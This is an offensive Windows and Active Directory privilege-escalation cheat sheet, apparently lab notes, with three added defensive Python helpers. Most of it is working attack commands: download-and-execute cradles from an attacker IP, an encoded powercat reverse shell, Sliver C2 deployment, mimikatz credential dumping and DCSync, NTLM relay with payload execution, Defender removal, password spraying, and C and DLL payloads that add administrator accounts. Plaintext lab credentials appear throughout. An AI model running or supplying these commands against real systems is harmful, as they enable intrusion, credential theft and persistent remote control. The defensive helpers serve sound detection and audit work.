A good guide https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/
https://0xarun.medium.com/complete-windows-privilege-escalation-9841d5ab82a6
gci C:\ -r -include proof.txt -ea 0
gci C:\ -r -include local.txt -ea 0
gci C:\ -r -include id_rsa -ea 0
Default TEMP C:\Users\default\AppData\Local\Temp
iwr -uri http://192.168.45.249:88/agent.exe -Outfile agent.exe ; .\agent.exe
iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe
iwr -uri http://192.168.45.188:8000/a.exe -Outfile C:\Users\default\AppData\Local\Temp\a.exe ; C:\Users\default\AppData\Local\Temp\a.exe
iwr -uri http://192.168.45.188:8000/beRoot.exe -Outfile beRoot.exe
nxc smb 172.16.175.10-14 172.16.175.82-83 -u joe -p Flowers1 -X "iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe"
whoami /priv
• SeImpersonatePrivilege allows impersonation (but not creation) of any token
• SeBackupPrivilege allows read access to the entire filesystem
• SeRestorePrivilege allows write access to the entire filesystem
• SeLoadDriverPrivilege allows loading drivers
• SeDebugPrivilege allows debugging other processes
SeImpersonatePrivilege
sliver getsystem
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
upload PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
if failing and you have permissions, check the print spooler:
sc qc spooler
sc stop Spooler
sc start Spooler
Write to admin$ -> impacket-psexec / impacket-smbexec
wmi / RPC -> impacket-wmiexec / evil-winrm
RPC -> AtExec
DCOM -> DcomExec
pass-the-hash
xfreerdp supports /pth:
if "Restricted Admin Mode" is on then
nxc smb hermes -u "offsec" -H "f8f68debc29a963c7a8eb39ca4459f87" -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
Work in progress:
sharpsh -h -c "powershell .\winPEASx64.exe" -u http://192.168.45.188:8000/winPEASx64.exe
maybe: sharpsh -- '-u http://192.168.56.1:9090/PowerView.ps1 -e -c RwBlAHQALQBEAG8AbQBhAGkAbgBHAHIAbwB1AHAAIAAiAEQAbwBtAGEAaQBuACAAQQBkAG0AaQBuAHMAIgA='
as DC admin: sharpsecdump '' -target=192.168
recon a windows machine from sliver:
whoami
getprivs
env
ps -T
netstat -l
ifconfig -A
pwd
execute -o -- setspn.exe -Q /
bof-roast TERMSRV/SECURE
https://github.com/sliverarmory/SharpView/blob/master/README.md
sharpview -- Get-NetDomain
sharpview -- Get-NetComputer
sharpview -- Get-NetUser
sharpview -- Get-NetShare
List domain groups and members. Needs LDAP access
sharpview -- Get-DomainGroup
sharpview -- Get-DomainUser
audit: sharpup -t 200 -- audit
privescCheck.ps1 - https://github.com/itm4n/PrivescCheck
upload /usr/share/powershell-empire/empire/server/data/module_source/privesc/PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
execute -X -n privesccheck powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
sliver armory docs: https://github.com/orgs/sliverarmory/repositories?type=all
execute -o cmd /c “C:\Program Files\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All
SharpHound 4: sharp-hound-4 -- '-c all,GPOLocalGroup'
Dump Windows SAM hashes: hashdump
Windows RDP
xfreerdp3 /u:user /d:domain /v:192.168.229.75 /p:'password' /drive:tmp,tmp
Powershell portscan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
reverse powershell via winrm
python3 -m http.server 8000
nc -lvnp 4242
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
iconv -f utf-8 -t utf-16le <<EOF | base64 -w0
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.188:8000/powercat.ps1');powercat -c 192.168.45.188 -p 4242 -e powershell
EOF
crackmapexec winrm -u apache -p 'New2Era4.!' --local-auth 192.168.175.96 -x 'powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA4ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgA0ADUALgAxADgAOAAgAC0AcAAgADQAMgA0ADIAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAAoA'
Active Directory
SMB password spray
crackmapexec smb 192.168.164.242 -u username.txt -p password.txt --shares --continue-on-success
crackmapexec smb 192.168.200.76 -u pete -p 'Nexus123!' -d corp.com --continue-on-success
impacket-GetNPUsers -dc-ip 192.168.133.70 -request -outputfile hashes.asreproast corp.com/pete
AD mapping
bloodhound-python -c All -u stephanie -p 'LegmanTeamBenzoin!!' -gc 'corp.com' -dc 192.168.133.75
Another method, which both imports into the neo4j database and marks accounts it can log on to:
~/.nxc/nxc.conf
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = user
bh_pass = pass
nxc ldap <ip> -u user -p pass --bloodhound --collection All
Windows commands
iwr -uri http://192.168.45.188:8000/winPEASx64.exe -Outfile winPEASx64.exe
iwr -uri http://192.168.45.188:8000/rustscan.exe -Outfile rustscan.exe
iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe
certutil.exe -urlcache -split -f http://192.168.45.188:4000/a.exe a.exe
gci C:\ -r -include local.txt -ea 0 | % { gc $_ }
gci C:\ -r -include proof.txt -ea 0 | % { gc $_ }
gci C:\ -r -include proof.txt -include local.txt -ea 0
Windows remote shell
evil-winrm -i 192.168.202.97 -u charlotte -p 'Game2On4.!'
Windows GPO https://github.com/FSecureLABS/SharpGPOAbuse
dir "\\secura.yzx\SysVol\secura.yzx\Policies\"
get-gpo -guid "{31B2F340-016D-11D2-945F-00C04FB984F9}"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --useraccount charlotte --GPOName "Default Domain Policy"
dir "\\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Load sliver to windows via powershell
iconv -f utf-8 -t utf-16le <<EOF | base64 -w0
powershell -Command "iwr http://192.168.45.188/agent.exe -OutFile \"$env:TEMP\agent.exe\"; start \"$env:TEMP\agent.exe\""
EOF
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "powershell -enc JAB0AGUAbQBwACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsAIAAkAG8AdQB0ACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJAB0AGUAbQBwACAAJwBBAFMAUwBPAEMASQBBAFQARQBEAF8ARABFAFQARQBOAFQASQBPAE4ALgBlAHgAZQAnADsAIABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA4AC8AQQBTAFMATwBDAEkAQQBUAEUARABfAEQARQBUAEUATgBUAEkATwBOAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAG8AdQB0AAoA"
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "set TMPFILE=%TEMP%\a.exe && bitsadmin /transfer x http://192.168.45.188/ASSOCIATED_DETENTION.exe %TMPFILE% && %TMPFILE%"
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "set TMPFILE=%TEMP%\a.exe && certutil -urlcache -split -f http://192.168.45.188/ASSOCIATED_DETENTION.exe %TMPFILE% && %TMPFILE%"
sliver-server
generate --mtls 192.168.45.188
mtls
use 5aa53b92
whoami
getprivs
upload /usr/share/peass/winpeas/winPEASx64.exe
execute -o -t 600 winPEASx64.exe
armory install c2tc-klist
c2tc-klist
cd c:\users\public
upload /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
shell
powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All
exit
download 20250420081619_BloodHound.zip
socks5 start
check the socks5 port, 1081!
sudo proxychains -q nmap -sT -Pn -p 21,80,443 172.16.120.240 172.16.120.241 172.16.120.254
proxychains -q crackmapexec smb 172.16.120.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.120.240 'beyond.com/john:dqsTwTpZPn#nL' -outputfile kerberoastables.txt
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimilib.dll
upload /usr/share/windows-resources/mimikatz/x64/mimispool.dll
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
see more at https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet?tab=readme-ov-file
https://github.com/gentilkiwi/mimikatz/wiki
all in one:
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::tickets" "lsadump::dcsync /user:corp\dave" "misc::memssp"
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::tickets" "lsadump::dcsync /user:secura.yzx\Eric.Wallows" "misc::memssp"
:EricLikesRunning800
whoami: mimikatz "token::whoami /full"
remote desktop sessions: mimikatz "ts::sessions" "exit"
extract domain hashes
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
kerberos TGT and service tickets
mimikatz "sekurlsa::tickets" "exit"
DC sync, user must have Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.
mimikatz "lsadump::dcsync /user:corp\dave" "exit"
pass the ticket
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"
mimikatz "privilege::debug" "misc::memssp"
.\mimikatz.exe "vault::cred" "vault::list" "token::elevate" "vault::cred" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "token::revert" "exit"
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
show shares
sharpmapexec ntlm smb /user:Eric.Wallows /password:EricLikesRunning800 /computername:192.168.175.97 /m:shares
LDAP
ldapdomaindump 192.168.175.97 -u 'secura\Eric.Wallows' -p 'EricLikesRunning800' -o ldapdomaindumpdir
Windows Privilege Escalation
The following listing contains some useful well-known SIDs in the context of privilege escalation.
S-1-0-0 Nobody
S-1-1-0 Everybody
S-1-5-11 Authenticated Users
S-1-5-18 Local System
S-1-5-domainidentifier-500 Administrator
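Added example (not from these notes): a small Python helper that parses string SIDs, resolves the well-known ones listed above and flags the RID-500 account, which stays the built-in Administrator even after it has been renamed, so audits should match on SID rather than on name. The extra RIDs (501, 512, 519) and the sample SIDs are assumptions constructed for the example.

```python
import re

# Well-known SIDs from the list above (identical on every Windows installation).
WELL_KNOWN_SIDS = {
    "S-1-0-0": "Nobody",
    "S-1-1-0": "Everybody",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "Local System",
}

# Well-known relative identifiers (the last sub-authority of an account SID).
# RID 500 is the built-in Administrator whatever the account is called.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    512: "Domain Admins",
    519: "Enterprise Admins",
}

# S-1-<identifier authority>-<sub-authority>[-<sub-authority>...]
SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split a string SID into (identifier_authority, [sub_authorities]).

    Raises ValueError for anything that is not a syntactically valid SID.
    """
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a valid SID: {sid!r}")
    authority = int(m.group(1))
    sub_authorities = [int(x) for x in m.group(2).split("-")[1:]]
    return authority, sub_authorities


def domain_identifier(sid):
    """Return the 'domainidentifier' part (21-X-Y-Z) of an NT account SID, or None
    when the SID is not a machine/domain account SID."""
    authority, subs = parse_sid(sid)
    if authority == 5 and len(subs) == 5 and subs[0] == 21:
        return "-".join(str(x) for x in subs[:4])
    return None


def describe_sid(sid):
    """Human-readable meaning of a SID using the two tables above."""
    _, subs = parse_sid(sid)  # validates the syntax first
    if sid in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[sid]
    if domain_identifier(sid) is not None:
        rid = subs[-1]
        name = WELL_KNOWN_RIDS.get(rid)
        return f"{name} (RID {rid})" if name else f"account with RID {rid}"
    return "unknown SID"


def is_builtin_administrator(sid):
    """True for the RID-500 account of any machine or domain."""
    return domain_identifier(sid) is not None and parse_sid(sid)[1][-1] == 500


# Constructed sample (not a real directory export): a renamed built-in
# Administrator and an ordinary user in the same domain.
SAMPLE_ACCOUNTS = {
    "S-1-5-21-1004336348-1177238915-682003330-500": "svc_backup",
    "S-1-5-21-1004336348-1177238915-682003330-1105": "dave",
}


def renamed_administrators(accounts):
    """Names of accounts that are RID 500 but are no longer called Administrator."""
    return [name for sid, name in accounts.items()
            if is_builtin_administrator(sid) and name.lower() != "administrator"]


if __name__ == "__main__":
    for sid, name in SAMPLE_ACCOUNTS.items():
        print(f"{name:12s} {sid} -> {describe_sid(sid)}")
    print("renamed administrators:", renamed_administrators(SAMPLE_ACCOUNTS))
```

The domain identifier is the 21-X-Y-Z block; everything before it is fixed, and only the trailing RID distinguishes accounts within one machine or domain.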
From Windows Vista onward, processes run on five integrity levels:
Situational Awareness
There are several key pieces of information we should always obtain:
Show my groups
whoami /groups
Show local users
Get-LocalUser
Show local groups
Get-LocalGroup
Show members of local group
Get-LocalGroupMember adminteam
Show system info
systeminfo
Net commands
ipconfig /all
route print
netstat -ano
List installed programs
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process
Hidden in Plain View
Find KeePass DB
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
search for more files
Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
search for them all
Get-ChildItem -Path C:\ -Include *.kdbx,flag.txt,*.ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.kdbx,flag.txt -File -Recurse -ErrorAction SilentlyContinue
show the flag
gci C:\Users -r -include flag.txt -ea 0 | % { gc $_ }
Run command as another user
if the user is active (logged on), use PsExec
if the account has the "Log on as a batch job" right, see schtasks /? or https://ss64.com/ps/scheduler.html
if you can log in via the GUI, use runas /user:
Information Goldmine PowerShell
Logging https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.host/start-transcript
See cmd and powershell history
Get-History
(Get-PSReadlineOption).HistorySavePath
PowerShell logging can be enabled: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.5&viewFallbackFrom=powershell-7.2
Event log: Applications and Services Logs - Microsoft - Windows - PowerShell - Operational, filter on event ID 4104
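Added example (not from these notes): the defender-side counterpart of the iconv -t utf-16le | base64 -w0 recipe used earlier on this page. Given a process command line (as logged by process-creation auditing), the Python below recognises any prefix of the -EncodedCommand switch, decodes the UTF-16LE/base64 payload and lists which of the download-cradle strings seen in these notes (IEX, Net.WebClient, DownloadString, iwr, -nop, -w hidden) appear in the clear text. The sample command lines are constructed; 192.0.2.10 is a documentation address.

```python
import base64
import binascii
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so the regex allows all fourteen prefixes, case-insensitively, followed by
# a base64 token (optionally opened with a quote).
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(1, 15))
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:" + _PREFIXES + r")\s+[\"']?([A-Za-z0-9+/=]{4,})"
)

# Strings from the download cradles shown in these notes.
CRADLE_INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
    "Invoke-WebRequest", "iwr ", "-nop", "-w hidden",
)


def encode_for_powershell(script):
    """Same transformation as iconv -t utf-16le | base64 -w0 (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script from a command line, or None
    when the switch is absent or the payload is not valid base64 / UTF-16LE."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le").rstrip("\r\n")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Triage one process command line: decode any encoded payload and report
    which cradle indicators appear in the command line or the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + "\n" + (decoded or "")).lower()
    hits = [ind for ind in CRADLE_INDICATORS if ind.lower() in haystack]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        "suspicious": bool(hits),
    }


# Constructed samples (not captured from a real host).
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"
SAMPLE_ENCODED = "powershell.exe -nop -w hidden -e " + encode_for_powershell(
    "IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10:8000/stage.ps1')"
)

if __name__ == "__main__":
    for line in (SAMPLE_BENIGN, SAMPLE_ENCODED):
        print(analyze_command_line(line))
```

Script block logging (event 4104) already records the decoded script, so the decoder matters most for sources that only carry the command line, such as process-creation events.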
WinRM shell via 5985/tcp https://github.com/Hackplayers/evil-winrm
evil-winrm -i 192.168.108.220 -u daveadmin -p 'qwertqwertqwert123!!'
Automated Enumeration
sudo apt install peass
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80
nc 192.168.50.220 4444
iwr -uri http://192.168.45.161/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe
Seatbelt https://github.com/GhostPack/Seatbelt
Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Compiled binaries: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
iwr -uri http://192.168.45.161/Seatbelt.exe -Outfile Seatbelt.exe
Service Binary Hijacking
List services and binary filepath
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Check permission
icacls "C:\xampp\apache\bin\httpd.exe"
C script adduser.c adds the user dave2
#include <stdlib.h>

int main()
{
    int i;
    /* create local user dave2 and add it to the local administrators group */
    i = system("net user dave2 password123! /add");
    i = system("net localgroup administrators dave2 /add");
    return 0;
}
Compile
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
check service
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
sc.exe query mysql
check my privileges (State only shows whether a privilege is currently enabled; disabled ones are still held by the token, so every listed privilege is available)
whoami /priv
reboot (Linux)
reboot now
reboot (Windows)
shutdown /r /t 0
Check administrators
Get-LocalGroupMember administrators
Try to automate the above process with https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
iwr -uri http://192.168.45.161/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
This doesn't work
Install-ServiceBinary -Name 'mysql'
So we use
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
$ModifiableFiles
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal
$ModifiableFiles
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal
$ModifiableFiles
DLL Hijacking
safe DLL search mode: when enabled (the default), the current directory is searched after the system directories, so a missing-DLL hijack needs a writable directory earlier in the search order, typically the application's own folder. List installed programs to find candidate applications:
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
TextShaping.cpp
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD  ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved)         // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
    {
        // Runs in the security context of the process that loaded the DLL.
        int i;
        i = system("net user dave3 password123! /add");
        i = system("net localgroup administrators dave3 /add");
        break;
    }
    case DLL_THREAD_ATTACH:  // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:  // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
compile
x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll
Unquoted Service Paths
C:\Program Files\My Program\My Service\service.exe is tried as:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\service.exe
Look for services with space and no quotes
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Find services with space in name
wmic service get name,pathname|findstr /i /v "C:\Windows\\"|findstr /i /v """
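Added example (not from these notes): the search-order walk described above, written out in Python so a service inventory can be audited for remediation. unquoted_path_candidates() reproduces the list of executables Windows tries for an unquoted path with spaces; audit_service_paths() applies it to (Name, PathName) pairs, skips services under C:\Windows like the findstr filter above, and reports the directories whose write ACLs need checking plus the quoting fix. The service list is constructed for the example and is not a real host's output.

```python
from pathlib import PureWindowsPath

# Services under the Windows directory are skipped, matching the
# findstr /i /v "C:\Windows\\" filter used in the notes.
SYSTEM_DIR_PREFIX = "c:\\windows\\"


def unquoted_path_candidates(image_path):
    """Executables Windows tries, in order, for an unquoted ImagePath that
    contains spaces: each space is a possible end of the file name, and a
    name without an extension gets .exe appended. Returns [] for a quoted path.
    Stops at the first token ending in .exe (the real binary); later tokens
    are treated as arguments."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def hijack_search_dirs(candidates):
    """Directories to check for non-administrator write access: the parent of
    every candidate tried before the real binary."""
    return [str(PureWindowsPath(c).parent) for c in candidates[:-1]]


def audit_service_paths(services):
    """services: iterable of (Name, PathName) as listed by
    Get-CimInstance -ClassName win32_service | Select Name,PathName.
    Returns findings for services whose path is unquoted, contains spaces and
    is not under C:\\Windows. The suggested fix quotes the binary path; any
    service arguments must be re-added by hand."""
    findings = []
    for name, pathname in services:
        if not pathname or pathname.strip().lower().startswith(SYSTEM_DIR_PREFIX):
            continue
        candidates = unquoted_path_candidates(pathname)
        if len(candidates) > 1:
            findings.append({
                "name": name,
                "path": pathname,
                "candidates": candidates,
                "dirs_to_check": hijack_search_dirs(candidates),
                "fix": f'sc config {name} binPath= "\\"{candidates[-1]}\\""',
            })
    return findings


# Constructed sample modelled on the Select Name,State,PathName output above.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("Apache2.4", r'"C:\xampp\apache\bin\httpd.exe" -k runservice'),
    ("mysql", r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql"),
    ("GammaService", r"C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe"),
]

if __name__ == "__main__":
    for finding in audit_service_paths(SAMPLE_SERVICES):
        print(finding["name"], finding["path"])
        for c in finding["candidates"]:
            print("   tries:", c)
        print("   check write access on:", finding["dirs_to_check"])
        print("   fix:", finding["fix"])
```

A path with spaces only in its arguments (the mysql entry) yields a single candidate and is not flagged; the quoted Apache path is skipped outright.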
copy adduser.exe
iwr -uri http://192.168.48.3/adduser.exe -Outfile Current.exe
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
start service - aka run adduser.exe
Start-Service GammaService
repeat for PowerUp
iwr http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Abusing Other Windows Components
Scheduled Tasks
schtasks /query
schtasks /query /fo LIST /v
filter out system stuff
(schtasks /query /fo LIST /v | Out-String -Stream) -join "`n" -split "\r?\n\r?\n" | Where-Object { ($_ -match "Task To Run:\s*(.+)") -and ($matches[1] -notmatch "(?i)^(%SystemRoot%|%windir%)\\system32" -and $matches[1] -notmatch "(?i)com handler") } | ForEach-Object { "$_`n----------------------------------------" }
check permissions
schtasks /query /fo LIST /v | Select-String "Task To Run:\s*(.+)" | ForEach-Object {
    $path = $_.Matches.Groups[1].Value
    # skip built-in tasks under system32 and COM handler tasks
    if ($path -notmatch "(?i)^(%SystemRoot%|%windir%)\\system32|com handler") {
        $acl = Get-Acl $path -ErrorAction SilentlyContinue
        $hasAccess = ($acl.Access | Where-Object {
            $_.IdentityReference -match $env:USERNAME -and $_.FileSystemRights -match "Write|FullControl"
        }) -ne $null
        [PSCustomObject]@{
            TaskPath      = $path
            CanModifyFile = $hasAccess
        }
    }
}
icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
iwr -uri http://192.168.48.3/adduser.exe -Outfile Current.exe
show flags
gci C:\Users -r -Filter flag.txt -ea 0 | % { gc $_.FullName }
Using Exploits
whoami /priv
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
https://github.com/sickn3ss/exploits/tree/master/CVE-2023-29360/x64/Release
whoami /priv
If the user has the 'SeImpersonatePrivilege' (or 'SeAssignPrimaryTokenPrivilege') right, use: https://github.com/tylerdotrar/SigmaPotato
Background: https://jlajara.gitlab.io/Potatoes_Windows_Privesc
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
python3 -m http.server 80
Download it to Windows
iwr -uri http://192.168.45.161/SigmaPotato.exe -OutFile SigmaPotato.exe
.\SigmaPotato "net user dave4 lab /add"
.\SigmaPotato "net localgroup Administrators dave4 /add"